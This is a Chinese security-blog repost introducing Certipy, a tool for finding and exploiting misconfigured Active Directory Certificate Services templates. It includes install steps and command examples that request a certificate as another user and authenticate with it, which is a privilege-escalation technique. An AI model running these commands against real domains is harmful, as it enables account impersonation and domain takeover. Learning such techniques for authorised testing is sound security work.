点击蓝字 关注我们
免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
添加星标不迷路
由于公众号推送规则改变,微信头条公众号信息会被折叠,为了避免错过公众号推送,请大家动动手指设置“星标”,设置之后就可以和从前一样收到推送啦
介绍
Certipy是一款基于Python开发的强大工具,该工具可以帮助广大研究人员枚举并利用活动目录证书服务(AD CS)中的错误配置项
下载
git clone https://github.com/ly4k/Certipy.git
python3 setup.py install
使用
1.查找漏洞模板
使用-vulnerable参数将搜索存在漏洞的证书模板:
certipy 'predator/john:[email protected]' find -vulnerable
2.自动化
在下面的使用样例中,用户john是一个低权限用户,可以注册Copy of Web Server模板:
certipy 'predator/john:[email protected]' auto
3.查询请求
用户josh将会以用户jane的身份请求一个有效的身份认证证书、
certipy 'predator/john:[email protected]' req -template 'Copy of Web Server' -ca 'predator-DC-CA' -alt 'jane'
4.身份认证
certipy 'predator/[email protected]' auth -cert ./2.crt -key ./2.key
使用certipy检测到目标 如果存在漏洞 应该存在这样的结果
这时候可以根据github上的步骤来一步一步的去做
https://github.com/ly4k/Certipy#domain-escalation
原文始发于微信公众号(SecHub网络安全社区):AD(活动目录)错误配置项检查工具Certipy的使用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论